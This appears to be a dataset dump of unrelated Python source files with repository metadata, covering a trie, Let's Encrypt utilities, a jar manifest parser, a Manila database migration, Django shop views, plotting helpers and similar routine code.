secret = self.keyring.get_secret(keyid)
if secret is None or secret.get_name() != self.get_secret_name(vm):
return ("", "")
if (secret.attributes.get("hvuri", None) != vm.conn.get_uri() or
secret.attributes.get("uuid", None) != vm.get_uuid()):
return ("", "")
return (secret.get_secret(), username or "")
def set_console_password(self, vm, password, username=""):
if not self.has_keyring():
return
secret = vmmSecret(self.get_secret_name(vm), password,
{"uuid" : vm.get_uuid(),
"hvuri": vm.conn.get_uri()})
keyid = self.keyring.add_secret(secret)
if keyid is None:
return
vm.set_console_password(username, keyid)
|
gpl-2.0
| -5,542,892,643,271,892,000
| 35.148415
| 79
| 0.604775
| false
| 3.603936
| true
| false
| false
|
armsky/Algorithms
|
Data Structure/trie.py
|
1
|
1534
|
class TrieNode:
# Initialize your data structure here.
def __init__(self):
self.children = {}
self.is_word = False
class Trie:
def __init__(self):
self.root = TrieNode()
# @param {string} word
# @return {void}
# Inserts a word into the trie.
def insert(self, word):
if word:
node = self.root
for char in word:
child = node.children.get(char)
if not child:
child = TrieNode()
node.children[char] = child
node = child
node.is_word = True
# @param {string} word
# @return {boolean}
# Returns if the word is in the trie.
def search(self, word):
if word:
node = self.root
for char in word:
if char not in node.children:
return False
node = node.children[char]
return node.is_word
else:
return False
# @param {string} prefix
# @return {boolean}
# Returns if there is any word in the trie
# that starts with the given prefix.
def startsWith(self, prefix):
if prefix:
node = self.root
for char in prefix:
if char not in node.children:
return False
node = node.children[char]
return True
return False
trie = Trie()
trie.insert("a")
trie.insert("ab")
print trie.search("a")
print trie.search("ab")
|
apache-2.0
| -8,049,908,019,752,421,000
| 25.448276
| 47
| 0.508475
| false
| 4.191257
| false
| false
| false
|
felixrieseberg/lets-encrypt-preview
|
letsencrypt/le_util.py
|
1
|
2392
|
"""Utilities for all Let's Encrypt."""
import collections
import errno
import os
import stat
from letsencrypt import errors
Key = collections.namedtuple("Key", "file pem")
# Note: form is the type of data, "pem" or "der"
CSR = collections.namedtuple("CSR", "file data form")
def make_or_verify_dir(directory, mode=0o755, uid=0):
"""Make sure directory exists with proper permissions.
:param str directory: Path to a directory.
:param int mode: Directory mode.
:param int uid: Directory owner.
:raises LetsEncryptClientError: if a directory already exists,
but has wrong permissions or owner
:raises OSError: if invalid or inaccessible file names and
paths, or other arguments that have the correct type,
but are not accepted by the operating system.
"""
try:
os.makedirs(directory, mode)
except OSError as exception:
if exception.errno == errno.EEXIST:
if not check_permissions(directory, mode, uid):
raise errors.LetsEncryptClientError(
"%s exists, but does not have the proper "
"permissions or owner" % directory)
else:
raise
def check_permissions(filepath, mode, uid=0):
"""Check file or directory permissions.
:param str filepath: Path to the tested file (or directory).
:param int mode: Expected file mode.
:param int uid: Expected file owner.
:returns: True if `mode` and `uid` match, False otherwise.
:rtype: bool
"""
file_stat = os.stat(filepath)
return stat.S_IMODE(file_stat.st_mode) == mode and file_stat.st_uid == uid
def unique_file(path, mode=0o777):
"""Safely finds a unique file for writing only (by default).
:param str path: path/filename.ext
:param int mode: File mode
:return: tuple of file object and file name
"""
path, tail = os.path.split(path)
count = 0
while True:
fname = os.path.join(path, "%04d_%s" % (count, tail))
try:
file_d = os.open(fname, os.O_CREAT | os.O_EXCL | os.O_RDWR, mode)
return os.fdopen(file_d, "w"), fname
except OSError:
pass
count += 1
def safely_remove(path):
"""Remove a file that may not exist."""
try:
os.remove(path)
except OSError as err:
if err.errno != errno.ENOENT:
raise
|
apache-2.0
| 6,374,653,857,685,918,000
| 27.47619
| 78
| 0.629599
| false
| 3.921311
| false
| false
| false
|
salimfadhley/jenkinsapi
|
jenkinsapi/utils/manifest.py
|
3
|
3306
|
"""
This module enables Manifest file parsing.
Copied from
https://chromium.googlesource.com/external/googleappengine/python/+/master
/google/appengine/tools/jarfile.py
"""
import zipfile
_MANIFEST_NAME = 'META-INF/MANIFEST.MF'
class InvalidJarError(Exception):
"""
InvalidJar exception class
"""
pass
class Manifest(object):
"""The parsed manifest from a jar file.
Attributes:
main_section: a dict representing the main (first)
section of the manifest.
Each key is a string that is an attribute, such as
'Manifest-Version', and the corresponding value is a string that
is the value of the attribute, such as '1.0'.
sections: a dict representing the other sections of the manifest.
Each key is a string that is the value of the 'Name' attribute for
the section, and the corresponding value is a dict like the
main_section one, for the other attributes.
"""
def __init__(self, main_section, sections):
self.main_section = main_section
self.sections = sections
def read_manifest(jar_file_name):
"""Read and parse the manifest out of the given jar.
Args:
jar_file_name: the name of the jar from which the manifest is to be read.
Returns:
A parsed Manifest object, or None if the jar has no manifest.
Raises:
IOError: if the jar does not exist or cannot be read.
"""
with zipfile.ZipFile(jar_file_name) as jar:
try:
manifest_string = jar.read(_MANIFEST_NAME).decode('UTF-8')
except KeyError:
return None
return _parse_manifest(manifest_string)
def _parse_manifest(manifest_string):
"""Parse a Manifest object out of the given string.
Args:
manifest_string: a str or unicode that is the manifest contents.
Returns:
A Manifest object parsed out of the string.
Raises:
InvalidJarError: if the manifest is not well-formed.
"""
manifest_string = '\n'.join(manifest_string.splitlines()).rstrip('\n')
section_strings = manifest_string.split('\n\n')
parsed_sections = [_parse_manifest_section(s) for s in section_strings]
main_section = parsed_sections[0]
sections = dict()
try:
for entry in parsed_sections[1:]:
sections[entry['Name']] = entry
except KeyError:
raise InvalidJarError(
'Manifest entry has no Name attribute: %s' % entry)
return Manifest(main_section, sections)
def _parse_manifest_section(section):
"""Parse a dict out of the given manifest section string.
Args:
section: a str or unicode that is the manifest section.
It looks something like this (without the >):
> Name: section-name
> Some-Attribute: some value
> Another-Attribute: another value
Returns:
A dict where the keys are the attributes (here, 'Name', 'Some-Attribute',
'Another-Attribute'), and the values are the corresponding
attribute values.
Raises:
InvalidJarError: if the manifest section is not well-formed.
"""
section = section.replace('\n ', '')
try:
return dict(line.split(': ', 1) for line in section.split('\n'))
except ValueError:
raise InvalidJarError('Invalid manifest %r' % section)
|
mit
| -2,833,017,234,510,234,000
| 33.082474
| 79
| 0.659407
| false
| 4.190114
| false
| false
| false
|
rogerthat-platform/rogerthat-backend
|
src/rogerthat/templates/__init__.py
|
1
|
3596
|
# -*- coding: utf-8 -*-
# Copyright 2017 GIG Technology NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.3@@
import logging
import os
from rogerthat import consts
from rogerthat.settings import get_server_settings
from rogerthat.templates.jinja_extensions import TranslateExtension
from rogerthat.translations import DEFAULT_LANGUAGE
from google.appengine.ext.webapp import template
import jinja2
from mcfw.rpc import returns, arguments
TEMPLATES_DIR = os.path.dirname(__file__)
_SUPPORTED_LANGUAGES = [d for d in os.listdir(TEMPLATES_DIR) if os.path.isdir(os.path.join(TEMPLATES_DIR, d))]
_CONSTS = dict(((name, getattr(consts, name)) for name in dir(consts) if name.upper() == name))
JINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader([os.path.join(os.path.dirname(__file__))]),
extensions=[TranslateExtension])
@returns(unicode)
@arguments(template_name=str, languages=[str], variables=dict, category=unicode)
def render(template_name, languages, variables, category=""):
logging.info("Rendering %s for languages %s" % (template_name, languages))
variables = dict(variables)
variables.update(_CONSTS)
variables["BASE_URL"] = get_server_settings().baseUrl
variables["INCLUDE_ROGERTHAT_DOT_NET"] = True
if not languages:
languages = list()
languages.append(DEFAULT_LANGUAGE)
logging.debug("Supported languages: %s" % _SUPPORTED_LANGUAGES)
for lang in languages:
lang = lang.replace('-', '_')
file_name = os.path.join(TEMPLATES_DIR, lang, category, "%s.tmpl" % template_name)
if lang in _SUPPORTED_LANGUAGES and os.path.exists(file_name):
return template.render(file_name, variables)
if '_' in lang:
lang = lang.split('_')[0]
file_name = os.path.join(TEMPLATES_DIR, lang, category, "%s.tmpl" % template_name)
if lang in _SUPPORTED_LANGUAGES and os.path.exists(file_name):
return template.render(file_name, variables)
raise NotImplementedError("Template not found!")
@returns([str])
@arguments(header=unicode)
def get_languages_from_header(header):
if not header:
return [DEFAULT_LANGUAGE]
try:
languages = list()
for item in header.split(','):
items = item.split(';')
lang = items[0]
splitted = lang.split('-')
if len(splitted) == 2:
lang = '%s_%s' % (splitted[0].lower(), splitted[1].upper())
if len(items) == 1:
languages.append((lang, 1.0))
else:
qualifier = items[1].split("=")[1]
languages.append((lang, float(qualifier)))
return [str(i[0]) for i in sorted(languages, key=lambda x: x[1], reverse=True)]
except:
logging.exception("Could not parse language header.")
return [DEFAULT_LANGUAGE]
@returns([str])
@arguments(request=object)
def get_languages_from_request(request):
return get_languages_from_header(request.headers.get('Accept-Language', None))
|
apache-2.0
| -4,756,188,799,871,613,000
| 38.955556
| 113
| 0.666574
| false
| 3.866667
| false
| false
| false
|
shub0/algorithm-data-structure
|
python/ugly_nums.py
|
1
|
1800
|
'''
Write a program to check whether a given number is an ugly number.
Ugly numbers are positive numbers whose prime factors only include 2, 3, 5. For example, 6, 8 are ugly while 14 is not ugly since it includes another prime factor 7.
Note that 1 is typically treated as an ugly number.
'''
class Solution(object):
def isUgly(self, num):
"""
:type num: int
:rtype: bool
"""
if num <= 0:
return self.isUgly(-1 * num)
while num > 1:
if (num % 2 == 0):
num /= 2
elif (num % 3 == 0):
num /= 3
elif (num % 5 == 0):
num /= 5
else:
return False
return True
def nthSuperUglyNumber(self, n, primes):
"""
:type n: int
:type primes: List[int]
:rtype: int
"""
size = len(primes)
nums = [1]
indices = [0] * size
local_num = [0] * size
while n > 1:
local_num = [ primes[index] * nums[indices[index]] for index in range(size) ]
num = min(local_num)
for index in range(size):
if local_num[index] == num:
indices[index] += 1
nums.append(num)
n -= 1
return nums[-1]
def nthUglyNumber(self, n):
"""
:type n: int
:rtype: int
"""
nums = [1]
i2,i3,i5=0,0,0
while n > 0:
u2,u3,u5 = nums[i2]*2, nums[i3]*3, nums[i5]*5
num = min(u2, u3, u5)
if num == u2:
i2 += 1
if num == u3:
i3 += 1
if num == u5:
i5 += 1
nums.append(num)
n -= 1
return num[-1]
|
bsd-3-clause
| 8,164,448,989,103,989,000
| 26.272727
| 165
| 0.436111
| false
| 3.73444
| false
| false
| false
|
dabrahams/zeroinstall
|
zeroinstall/injector/config.py
|
1
|
4191
|
"""
Holds user settings and various helper objects.
"""
# Copyright (C) 2011, Thomas Leonard
# See the README file for details, or visit http://0install.net.
from zeroinstall import _
import os
from logging import info, warn
import ConfigParser
from zeroinstall import zerostore
from zeroinstall.injector.model import network_levels, network_full
from zeroinstall.injector.namespaces import config_site, config_prog
from zeroinstall.support import basedir
DEFAULT_FEED_MIRROR = "http://roscidus.com/0mirror"
DEFAULT_KEY_LOOKUP_SERVER = 'https://keylookup.appspot.com'
class Config(object):
"""
@ivar auto_approve_keys: whether to approve known keys automatically
@type auto_approve_keys: bool
@ivar handler: handler for main-loop integration
@type handler: L{handler.Handler}
@ivar key_info_server: the base URL of a key information server
@type key_info_server: str
@ivar feed_mirror: the base URL of a mirror site for keys and feeds
@type feed_mirror: str | None
@ivar freshness: seconds since a feed was last checked before it is considered stale
@type freshness: int
"""
__slots__ = ['help_with_testing', 'freshness', 'network_use', 'feed_mirror', 'key_info_server', 'auto_approve_keys',
'_fetcher', '_stores', '_iface_cache', '_handler', '_trust_mgr', '_trust_db']
def __init__(self, handler = None):
self.help_with_testing = False
self.freshness = 60 * 60 * 24 * 30
self.network_use = network_full
self._handler = handler
self._fetcher = self._stores = self._iface_cache = self._trust_mgr = self._trust_db = None
self.feed_mirror = DEFAULT_FEED_MIRROR
self.key_info_server = DEFAULT_KEY_LOOKUP_SERVER
self.auto_approve_keys = True
@property
def stores(self):
if not self._stores:
self._stores = zerostore.Stores()
return self._stores
@property
def iface_cache(self):
if not self._iface_cache:
from zeroinstall.injector import iface_cache
self._iface_cache = iface_cache.iface_cache
#self._iface_cache = iface_cache.IfaceCache()
return self._iface_cache
@property
def fetcher(self):
if not self._fetcher:
from zeroinstall.injector import fetch
self._fetcher = fetch.Fetcher(self)
return self._fetcher
@property
def trust_mgr(self):
if not self._trust_mgr:
from zeroinstall.injector import trust
self._trust_mgr = trust.TrustMgr(self)
return self._trust_mgr
@property
def trust_db(self):
from zeroinstall.injector import trust
self._trust_db = trust.trust_db
@property
def handler(self):
if not self._handler:
from zeroinstall.injector import handler
if os.isatty(1):
self._handler = handler.ConsoleHandler()
else:
self._handler = handler.Handler()
return self._handler
def save_globals(self):
"""Write global settings."""
parser = ConfigParser.ConfigParser()
parser.add_section('global')
parser.set('global', 'help_with_testing', self.help_with_testing)
parser.set('global', 'network_use', self.network_use)
parser.set('global', 'freshness', self.freshness)
parser.set('global', 'auto_approve_keys', self.auto_approve_keys)
path = basedir.save_config_path(config_site, config_prog)
path = os.path.join(path, 'global')
parser.write(open(path + '.new', 'w'))
os.rename(path + '.new', path)
def load_config(handler = None):
config = Config(handler)
parser = ConfigParser.RawConfigParser()
parser.add_section('global')
parser.set('global', 'help_with_testing', 'False')
parser.set('global', 'freshness', str(60 * 60 * 24 * 30)) # One month
parser.set('global', 'network_use', 'full')
parser.set('global', 'auto_approve_keys', 'True')
path = basedir.load_first_config(config_site, config_prog, 'global')
if path:
info("Loading configuration from %s", path)
try:
parser.read(path)
except Exception as ex:
warn(_("Error loading config: %s"), str(ex) or repr(ex))
config.help_with_testing = parser.getboolean('global', 'help_with_testing')
config.network_use = parser.get('global', 'network_use')
config.freshness = int(parser.get('global', 'freshness'))
config.auto_approve_keys = parser.getboolean('global', 'auto_approve_keys')
assert config.network_use in network_levels, config.network_use
return config
|
lgpl-2.1
| 1,600,320,682,563,970,000
| 31.238462
| 117
| 0.715581
| false
| 3.199237
| true
| false
| false
|
cjmathy/ode_model
|
ode_modeler/plot.py
|
1
|
3666
|
import os
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
def plot_all_queries(species, queries, out_dir, out_format,
plot_species, ttot, **kwargs):
'''
Description:
This method creates plots for each species, plotting timecourse curves
from all queries on the same plot.
Input:
species - a dictionary mapping strings to Species objects.
queries - a list of query objects.
out_dir - the path to the output directory.
out_format - the file format for output figures.
plot_species - a list containing species names to be plotted. default
is to generate plots for all species.
ttot - the total length of simulation.
'''
if out_format == 'pdf_one':
pdf = PdfPages(os.path.join(out_dir + '/all_queries.pdf'))
if plot_species[0] is 'all':
plot_species = species.keys()
for sp in plot_species:
fig = plt.figure()
for query in queries:
plt.plot(query.t, query.concentrations[:, species[sp].index])
plt.title(sp)
plt.ylabel('Concentration (uM)')
plt.xlabel('Time (seconds)')
plt.legend(queries)
plt.xticks(np.arange(0, ttot+1, ttot/2))
plt.grid(True)
if out_format == 'pdf_mult':
pdf = PdfPages(
os.path.join(out_dir + '/{}.pdf'.format(sp)))
pdf.savefig()
pdf.close()
if out_format == 'png':
fig.savefig(os.path.join(out_dir + '/{}.png'.format(sp)))
if out_format == 'pdf_one':
pdf.savefig()
plt.close()
if out_format == 'pdf_one':
pdf.close()
return
def plot_each_query(species, queries, out_dir, out_format,
plot_species, ttot, **kwargs):
'''
Description:
This method creates plots for each species, plotting timecourse curves
from each query separately.
Input:
species - a dictionary mapping strings to Species objects.
queries - a list of query objects.
out_dir - the path to the output directory.
out_format - the file format for output figures.
plot_species - a list containing species names to be plotted. default
is to generate plots for all species.
ttot - the total length of simulation.
'''
if plot_species[0] is 'all':
plot_species = species.keys()
for query in queries:
if out_format == 'pdf_one':
pdf = PdfPages(
os.path.join(
out_dir + '/{}.pdf'.format(query.name)))
for sp in plot_species:
fig = plt.figure()
plt.plot(query.t, query.concentrations[:, species[sp].index])
plt.title('{}, {}'.format(sp, query.name))
plt.ylabel('Concentration (uM)')
plt.xlabel('Time (seconds)')
plt.xticks(np.arange(0, ttot+1, ttot/2))
plt.grid(True)
if out_format == 'pdf_mult':
pdf = PdfPages(
os.path.join(
out_dir + '/{}_{}.pdf'.format(
query.name, sp)))
pdf.savefig()
pdf.close()
if out_format == 'png':
fig.savefig(
os.path.join(
out_dir + '/{}_{}.png'.format(
query.name, sp)))
if out_format == 'pdf_one':
pdf.savefig()
plt.close()
if out_format == 'pdf_one':
pdf.close()
return
|
apache-2.0
| 3,636,057,399,998,828,000
| 30.333333
| 78
| 0.533824
| false
| 4.091518
| false
| false
| false
|
Iwan-Zotow/runEGS
|
XcIO/names_helper.py
|
1
|
2104
|
# -*- coding: utf-8 -*-
EGSPHAN_EXT = ".egsphant"
EGSINP_EXT = ".egsinp"
EGSPHSF_EXT = ".egsphsp1"
def make_cup_prefix(radUnit, outerCup, innerCupSer, innerCupNum):
"""
Makes filename prefix given RU, OC, IC info
Parameters
----------
radUnit: string
radiation unit
outerCup: string
outer cup info
innerCupSer: string
inner cup serial line
innerCupNum: integer
inner cup number
returns: string
clinical cup name
"""
return "R" + radUnit + "O" + outerCup + "I" + innerCupSer + innerCupNum
return "R" + radUnit + "O" + outerCup + "I" + innerCupSer + innerCupNum
def make_qualified_name(file_prefix, cl, shot):
"""
Makes qualified name
Parameters
----------
file_prefix: string
prefix with RU and cup info
cl: collimator
collimator info
shot: (float,float) tuple
shot position
returns: string
fully qualified cup name
"""
return file_prefix + str(cl) + "_" + "Y{0}Z{1}".format(int(shot[0]),int(shot[1]))
def make_egsinput_name(full_prefix):
"""
Makes EGS input name
"""
return full_prefix + EGSINP_EXT
def parse_file_prefix(s):
"""
Parse file prefix string and produce rad.unit, outer cup, inner cup, inner cup number, collimator
"""
radUnit = str(s[1:2])
outerCup = str(s[3:4])
innerCupSer = str(s[5:6])
innerCupNum = str(s[6:8])
coll = int(str(s[9:11]))
return (radUnit, outerCup, innerCupSer, innerCupNum, coll)
def parse_shot(s):
"""
Parse input string to extract shot
"""
idx_shot = s.find("_")
if idx_shot < 0:
raise ValueError("No shot info in input")
sh = s[idx_shot+1:]
idx_Y = sh.find("Y")
if idx_Y < 0:
raise ValueError("No Y shot position in input")
idx_Z = sh.find("Z")
if idx_Z < 0:
raise ValueError("No Z shot position in input")
sh_Y = sh[idx_Y+1:idx_Z]
sh_Z = sh[idx_Z+1:]
return (float(sh_Y), float(sh_Z))
|
apache-2.0
| 574,515,979,374,324,900
| 21.147368
| 101
| 0.565589
| false
| 3.140299
| false
| false
| false
|
openstack/manila
|
manila/db/migrations/alembic/versions/344c1ac4747f_add_share_instance_access_rules_status.py
|
1
|
4287
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Remove access rules status and add access_rule_status to share_instance
model
Revision ID: 344c1ac4747f
Revises: dda6de06349
Create Date: 2015-11-18 14:58:55.806396
"""
# revision identifiers, used by Alembic.
revision = '344c1ac4747f'
down_revision = 'dda6de06349'
from alembic import op
from sqlalchemy import Column, String
from manila.common import constants
from manila.db.migrations import utils
priorities = {
'active': 0,
'new': 1,
'error': 2
}
upgrade_data_mapping = {
'active': 'active',
'new': 'out_of_sync',
'error': 'error',
}
def upgrade():
"""Transform individual access rules states to 'access_rules_status'.
WARNING: This method performs lossy converting of existing data in DB.
"""
op.add_column(
'share_instances',
Column('access_rules_status', String(length=255))
)
connection = op.get_bind()
share_instances_table = utils.load_table('share_instances', connection)
instance_access_table = utils.load_table('share_instance_access_map',
connection)
# NOTE(u_glide): Data migrations shouldn't be performed on live clouds
# because it will lead to unpredictable behaviour of running operations
# like migration.
instances_query = (
share_instances_table.select()
.where(share_instances_table.c.status == constants.STATUS_AVAILABLE)
.where(share_instances_table.c.deleted == 'False')
)
for instance in connection.execute(instances_query):
access_mappings_query = instance_access_table.select().where(
instance_access_table.c.share_instance_id == instance['id']
).where(instance_access_table.c.deleted == 'False')
status = constants.STATUS_ACTIVE
for access_rule in connection.execute(access_mappings_query):
if (access_rule['state'] == constants.STATUS_DELETING or
access_rule['state'] not in priorities):
continue
if priorities[access_rule['state']] > priorities[status]:
status = access_rule['state']
# pylint: disable=no-value-for-parameter
op.execute(
share_instances_table.update().where(
share_instances_table.c.id == instance['id']
).values({'access_rules_status': upgrade_data_mapping[status]})
)
op.drop_column('share_instance_access_map', 'state')
def downgrade():
op.add_column(
'share_instance_access_map',
Column('state', String(length=255))
)
connection = op.get_bind()
share_instances_table = utils.load_table('share_instances', connection)
instance_access_table = utils.load_table('share_instance_access_map',
connection)
instances_query = (
share_instances_table.select()
.where(share_instances_table.c.status == constants.STATUS_AVAILABLE)
.where(share_instances_table.c.deleted == 'False')
)
for instance in connection.execute(instances_query):
# NOTE(u_glide): We cannot determine if a rule is applied or not in
# Manila, so administrator should manually handle such access rules.
if instance['access_rules_status'] == 'active':
state = 'active'
else:
state = 'error'
# pylint: disable=no-value-for-parameter
op.execute(
instance_access_table.update().where(
instance_access_table.c.share_instance_id == instance['id']
).where(instance_access_table.c.deleted == 'False').values(
{'state': state}
)
)
op.drop_column('share_instances', 'access_rules_status')
|
apache-2.0
| 2,971,264,081,608,974,300
| 31.477273
| 76
| 0.642641
| false
| 3.99534
| false
| false
| false
|
michaelgichia/WeideShop
|
weideshop/products/views.py
|
1
|
3232
|
# -*- coding: utf-8 -*-
# Third party stuff
from django.shortcuts import render, get_object_or_404
from django.views.generic import ListView, DetailView
from django.views.generic.base import TemplateView
# Our stuff
from .models import Product, Subcategory, Category
class CategoryListView(ListView):
"""
Browse all products in the categories.
"""
models = Category
template_name = 'products/category_list.html'
context_object_name = "Category list"
def get_queryset(self):
"""
Returns all categories.
"""
return Category.objects.get_queryset().all()
class SubcategoryListView(ListView):
"""
Browse all products in the sub-catalogue.
"""
model = Subcategory
template_name = 'products/subcategory_list.html'
context_object_name = "Sub-Category list"
category_model = Category
def get_queryset(self):
"""
Returns all sub-categories.
"""
self.category = get_object_or_404(Category, category_slug = self.kwargs.get('category_slug'))
return Subcategory.objects.filter(category = self.category)
def get_context_data(self, **kwargs):
"""
Returns self.category_slug needed
on the subcategory_list.html as a
one of the {% url %} slug params.
"""
context = super(SubcategoryListView, self).get_context_data(**kwargs)
context['categories'] = Category.objects.all()
context['category_slug'] = self.kwargs.get('category_slug')
return context
class ProductListView(ListView):
"""
Browse products according to previous selected subcategory.
"""
model = Product
template_name = 'products/product_list.html'
context_object_name = "Product list"
def get_context_data(self, **kwargs):
"""
Returns self.category_slug and self.subcategory)slug needed
on the product_list.html as a
one of the {% url %} slug params.
"""
context = super(ProductListView, self).get_context_data(**kwargs)
# Get category_slug
context['categories'] = Category.objects.all()
context['category_slug'] = self.kwargs.get('category_slug')
# Get subcategory_slug
context['subcategories'] = Subcategory.objects.all()
context['subcategory_slug'] = self.kwargs.get('subcategory_slug')
return context
def get_queryset(self):
"""
Browse all products under selected subcategory.
"""
self.sub_category = get_object_or_404(Subcategory, subcategory_slug = self.kwargs.get('subcategory_slug'))
return Product.objects.filter(sub_category = self.sub_category)
class ProductDetailView(DetailView):
"""
Display individual products details
"""
model = Product
def get_object(self):
"""
For unknown reasons :) you must pass self.product_slug
"""
object = get_object_or_404(Product, product_slug=self.kwargs['product_slug'])
return object
class CatalogueListView(ListView):
"""
Display all products in the db.
"""
model = Product
def get_queryset(self):
"""
Returns all categories.
"""
return Product.objects.get_queryset().all()
class CatalogueDetailView(DetailView):
"""
Display individual products details
"""
model = Product
template_name = 'products/product_detail.html'
slug_field = 'product_slug'
def get_object(self):
"""
Call the superclass
"""
object = super(CatalogueDetailView, self).get_object()
return object
|
bsd-2-clause
| 3,212,083,904,628,984,000
| 23.671756
| 108
| 0.716584
| false
| 3.409283
| false
| false
| false
|
lcrees/knife
|
knife/_active.py
|
1
|
6481
|
# -*- coding: utf-8 -*-
'''active knives'''
from threading import local
from collections import deque
from contextlib import contextmanager
from stuf.utils import clsname
from knife._compat import loads, optimize
class _ActiveMixin(local):
'''active knife mixin'''
def __init__(self, *things, **kw):
'''
Initialize :mod:`knife`.
:argument things: incoming things
:keyword integer snapshots: snapshots to keep (default: ``5``)
'''
incoming = deque()
incoming.extend(things)
super(_ActiveMixin, self).__init__(incoming, deque(), **kw)
# working things
self._work = deque()
# holding things
self._hold = deque()
@property
@contextmanager
def _chain(self, d=optimize):
# take snapshot
snapshot = d(self._in)
# rebalance incoming with outcoming
if self._history:
self._in.clear()
self._in.extend(self._out)
# make snapshot original snapshot?
else:
self._original = snapshot
# place snapshot at beginning of snapshot stack
self._history.appendleft(snapshot)
# move incoming things to working things
self._work.extend(self._in)
yield
out = self._out
# clear outgoing things
out.clear()
# extend outgoing things with holding things
out.extend(self._hold)
# clear working things
self._work.clear()
# clear holding things
self._hold.clear()
@property
def _iterable(self):
# derived from Raymond Hettinger Python Cookbook recipe # 577155
call = self._work.popleft
try:
while 1:
yield call()
except IndexError:
pass
def _append(self, thing):
# append thing after other holding things
self._hold.append(thing)
return self
def _xtend(self, things):
# place things after holding things
self._hold.extend(things)
return self
def _prependit(self, things, d=optimize):
# take snapshot
snapshot = d(self._in)
# make snapshot original snapshot?
if self._original is None:
self._original = snapshot
# place snapshot at beginning of snapshot stack
self._history.appendleft(snapshot)
# place thing before other holding things
self._in.extendleft(reversed(things))
return self
def _appendit(self, things, d=optimize):
# take snapshot
snapshot = d(self._in)
# make snapshot original snapshot?
if self._original is None:
self._original = snapshot
# place snapshot at beginning of snapshot stack
self._history.appendleft(snapshot)
# place things after other incoming things
self._in.extend(things)
return self
def _pipeit(self, knife):
knife.clear()
knife._history.clear()
knife._history.extend(self._history)
knife._original = self._original
knife._baseline = self._baseline
knife._out.extend(self._out)
knife._worker = self._worker
knife._args = self._args
knife._kw = self._kw
knife._wrapper = self._wrapper
knife._pipe = self
return knife
def _unpipeit(self):
piped = self._pipe
piped.clear()
piped._history.clear()
piped._history.extend(self._history)
piped._original = self._original
piped._baseline = self._baseline
piped._out.extend(self._out)
piped._worker = self._worker
piped._args = self._args
piped._kw = self._kw
piped._wrapper = self._wrapper
self.clear()
return piped
def _repr(self, clsname_=clsname, list_=list):
# object representation
return self._REPR.format(
self.__module__,
clsname_(self),
list_(self._in),
list_(self._work),
list_(self._hold),
list_(self._out),
)
def _len(self, len=len):
# length of incoming things
return len(self._in)
class _OutMixin(_ActiveMixin):
'''active output mixin'''
def _undo(self, snapshot=0, loads_=loads):
# clear everything
self.clear()
# if specified, use a specific snapshot
if snapshot:
self._history.rotate(-(snapshot - 1))
self._in.extend(loads_(self._history.popleft()))
return self
def _snapshot(self, d=optimize):
# take baseline snapshot of incoming things
self._baseline = d(self._in)
return self
def _rollback(self, loads_=loads):
# clear everything
self.clear()
# clear snapshots
self._clearsp()
# revert to baseline snapshot of incoming things
self._in.extend(loads_(self._baseline))
return self
def _revert(self, loads_=loads):
# clear everything
self.clear()
# clear snapshots
self._clearsp()
# clear baseline
self._baseline = None
# restore original snapshot of incoming things
self._in.extend(loads_(self._original))
return self
def _clear(self, list_=list):
# clear worker
self._worker = None
# clear worker positional arguments
self._args = ()
# clear worker keyword arguments
self._kw = {}
# default iterable wrapper
self._wrapper = list_
# clear pipe
self._pipe = None
# clear incoming things
self._in.clear()
# clear working things
self._work.clear()
# clear holding things
self._hold.clear()
# clear outgoing things
self._out.clear()
return self
def _iterate(self, iter_=iter):
return iter_(self._out)
def _peek(self, len_=len, list_=list):
wrap, out = self._wrapper, self._in
value = list_(wrap(i) for i in out) if self._each else wrap(out)
self._each = False
self._wrapper = list_
return value[0] if len_(value) == 1 else value
def _get(self, len_=len, list_=list):
wrap, out = self._wrapper, self._out
value = list_(wrap(i) for i in out) if self._each else wrap(out)
self._each = False
self._wrapper = list_
return value[0] if len_(value) == 1 else value
|
bsd-3-clause
| -5,760,023,825,560,073,000
| 28.193694
| 72
| 0.569511
| false
| 4.314913
| false
| false
| false
|
agingrasc/StrategyIA
|
ai/STA/Strategy/StrategyBook.py
|
1
|
1930
|
# Under MIT license, see LICENSE.txt
""" Livre des stratégies. """
from .HumanControl import HumanControl
from .SimpleDefense import SimpleDefense
from .SimpleOffense import SimpleOffense
from .DoNothing import DoNothing
class StrategyBook(object):
"""
Cette classe est capable de récupérer les stratégies enregistrés dans la
configuration des stratégies et de les exposer au Behavior Tree en
charge de sélectionner la stratégie courante.
"""
def __init__(self, p_info_manager):
self.strategy_book = {'SimpleDefense' : SimpleDefense,
'SimpleOffense' : SimpleOffense,
'HumanControl' : HumanControl,
'DoNothing' : DoNothing }
self.info_manager = p_info_manager
def get_strategies_name_list(self):
return list(self.strategy_book.keys())
def ball_in_offense_zone(self):
self.team_zone_side = "left" # constante bidon TODO: trouver une facon de demander au InfoManager notre zone initiale
self.ball_x_position = self.info_manager.get_ball_position().x
if self.team_zone_side == "left":
return self.ball_x_position > 0
return self.ball_x_position < 0
def most_opponents_in_our_zone(self):
pass
def get_optimal_strategy(self):
# simple choice
if self.ball_in_offense_zone():
self.chosen_strategy = SimpleOffense
else:
self.chosen_strategy = SimpleDefense
self.chosen_strategy = DoNothing
return self.chosen_strategy
def get_strategy(self, strategy_name):
return self.strategy_book[strategy_name]
def debug_show_all_players_tactics(self):
for i in range(0,6):
debug_string = ""
debug_string += "Robot:" + str(i) + str(self.info_manager.get_player_tactic(i))
print(debug_string)
|
mit
| -4,660,321,697,038,851,000
| 33.321429
| 126
| 0.631634
| false
| 3.674952
| false
| false
| false
|
s-macke/Kerasimo
|
models/snake.py
|
1
|
1336
|
from keras.models import Sequential, load_model
from keras.layers import *
from qlearning4k.games import Snake
